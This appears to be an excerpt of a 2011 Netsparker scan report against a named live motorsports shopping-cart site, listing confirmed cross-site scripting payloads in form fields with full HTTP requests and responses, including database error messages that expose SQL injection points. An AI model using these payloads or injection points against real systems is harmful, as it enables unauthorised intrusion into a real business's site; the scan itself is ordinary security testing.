<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST '"--></style></script><script>alert(0x000243)</script>
txtFax POST 3
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000243)%3c%2fscript%3e&txtFax=3&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:50:22 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x000243)</script>"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST '"--></style></script><script>alert(0x000244)</script>
txtEmail POST netsparker@example.com

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 347
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000244)%3c%2fscript%3e&txtEmail=netsparker%40example.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:50:25 GMT
Content-Length: 12077
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB">AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE" selected>DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x000244)</script>"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST 3
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST DE
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST '"--></style></script><script>alert(0x000245)</script>

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 324
Accept-Encoding: gzip, deflate

Type=42&txtpassword=3&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=DE&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000245)%3c%2fscript%3e

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:50:33 GMT
Content-Length: 1413
Content-Type: text/html
Expires: Mon, 02 May 2011 03:50:33 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x000245)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp <br>ASP Line: 469 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp

/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp

Parameters

Parameter Type Value
Add POST Add Item To Shopping Cart
hdnType POST 12
txtPartNoAdd POST '><script>alert(9)</script>
txtQtyAdd POST 3

Request

POST /xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp?Type12
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 110
Accept-Encoding: gzip, deflate

Add=Add+Item+To+Shopping+Cart&hdnType=12&txtPartNoAdd='%3e%3cscript%3enetsparker(9)%3c%2fscript%3e&txtQtyAdd=3

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:55:53 GMT
Content-Length: 1441
Content-Type: text/html
Expires: Mon, 02 May 2011 03:55:53 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'Field1 = ''><script>netsparker(9)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/shoppingcart/ProcessOrder.asp <br>ASP Line: 676 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

Parameters

Parameter Type Value
txtEmail POST '"--></style></script><script>alert(0x0002AE)</script>

Request

POST /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 94
Accept-Encoding: gzip, deflate

txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0002AE)%3c%2fscript%3e

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:56:37 GMT
Content-Length: 1413
Content-Type: text/html
Expires: Mon, 02 May 2011 03:56:38 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
